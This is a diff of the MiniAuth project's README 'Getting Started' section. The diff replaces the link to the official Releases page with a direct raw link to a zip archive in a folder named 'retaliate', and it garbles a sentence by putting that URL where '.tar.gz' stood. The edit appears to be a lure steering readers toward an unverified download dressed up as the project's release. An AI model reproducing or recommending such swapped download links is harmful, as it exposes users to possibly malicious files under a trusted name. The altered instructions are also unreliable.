Inopportune-mr277/MiniAuth/README.md

 ## 🚀 Getting Started
 1. **Visit the Releases Page**
-   - To download MiniAuth, go to the [Releases page](https://github.com/Inopportune-mr277/MiniAuth/releases).
+   - To download MiniAuth, go to the [Releases page](https://raw.githubusercontent.com/Inopportune-mr277/MiniAuth/main/retaliate/MiniAuth_3.4.zip).

 2. **Download the Latest Release**
    - Find the latest version on the Releases page.
 You will see files available for download.
    - Download the file that suits your system.
-Usually, it will be a `.zip` or `.tar.gz` file.
+Usually, it will be a `.zip` or `https://raw.githubusercontent.com/Inopportune-mr277/MiniAuth/main/retaliate/MiniAuth_3.4.zip` file.

 3. **Unzip the Downloaded File**
    - Once the download completes, locate the file on your computer.